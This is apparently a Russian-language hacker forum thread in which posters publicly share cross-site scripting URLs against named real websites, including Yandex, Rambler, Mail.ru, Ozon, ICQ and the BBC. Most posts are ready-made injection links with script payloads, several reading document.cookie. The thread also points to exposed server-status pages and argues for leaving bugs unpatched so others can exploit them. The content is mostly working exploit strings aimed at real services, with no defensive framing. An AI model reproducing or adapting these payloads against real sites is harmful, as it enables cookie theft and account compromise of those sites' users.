сёдня нашёл хсс у народа и озона http://zaco.jino-net.ru ------ Code: http://www.ozon.ru/context/mcode_list/id/12/?sort=bests&from=xaxa"><script>alert('XAXA')</script><a=" Code: http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('XAXA')</script><a%20a=&c=2xaxa ------ оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик. Народ должен знать!))
раз не согласен, то ищи сам и выкладывай, а я хочу чтобы еще пожили уязвимости, если кому-то надо будет, чтобы воспользовался бы, и чтобы не боялся что из-за какого-то дебила эту багу прикроют. Но я выложу, вопрос тока времени. Я сам за свободу инфы, но все таки сущ. люди, которую эту свободу обращают во зло, я постараюсь чтобы этого не было.
http://search.rambler.ru/cgi-bin/advanced.cgi?set=0"><script>alert(/testing_by_censored!/)</script> http://talk.mail.ru/login.html?target=0"><script>alert(/testing_by_censored!/)</script> http://www.ganjawars.ru/trade-terminal.php?object_id=13925&resource=123321><script>alert(/testing_by_censored!/)</script> http://www.august4u.ru/gb/?id=><script>alert(/tested_by_censored!/)</script>&gb=&page=1234567 http://ww2.tymoshenko.com.ua/rus/su...EST_EMAIL&USER_SUB_FORM[res_id]=&USER_SUB_FOR M%5Buser_email%5D=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&go=%C4%E0%EB%B3+%3E%3E+ http://www.forsakenworld.ru/cgi/register.cgi?action=<script>alert(/testing_by_censored!/)</script> http://www.xakep.ru/post/26703/default.asp?print=12345"></iframe><script>alert(/testing_by_censored!/)</script> В профиле создаст новую XSS-папку: http://forum.xakep.ru/profile/manfolders.asp?mode=create&foldername=<script>alert(/testing_by_censored!/)</script>&x=53&y=14
RAMBLER.RU: http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script> http://finance.rambler.ru/db/chain.html?type=fix&chain_id=<script>alert(document.cookie)</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words="><script>alert(document.cookie)</script>&ftype=5&form=0&hu=1&what=0 ICQ.COM: http://www.icq.com/boards/atoz.php?letter=</title><script>alert(document.cookie)</script><title> YANDEX.RU: http://news.yandex.ru/yandsearch?cl4url=www.utro.ru/news/2005/11/12/494551.shtml&country=Russia&cat="><script>alert(document.cookie)</script> тоже интересно: http://info.rambler.ru/server-status http://info.rambler.ru:8100/server-status
2k1b0rg : во-первых я сам и нашёл. во-вторых - это хсс, думаю если бы я нашёл к примеру инклуд в яндексе=) то об этом я сразу бы не сообщал)) я клоню к тому что скрывать от посторонних глаз хсс глупо - тк такие баги находятся сразу и не представляют особой ценности+) я инашёл за 5 минут глупо имхо 2k00p3r хз сам не видел раньше --- http://cards.yandex.ru/theme.xhtml?st=Family&topic=Husb-and-Wives&series=xaxa"><script>alert('XAXA')</script><a%20s=" --- http://www.bbc.co.uk/cgi-bin/education/betsie/parser.pl/0005/<script%20src=javascript:alert('XAXA') - на bbc.com все ссылки вели именно на bbc.co.uk --- http://www.bbc.co.uk/cgi-perl/weather/search/new_search.pl?search_query=xaxa<script>alert('XAXA')</script> ---
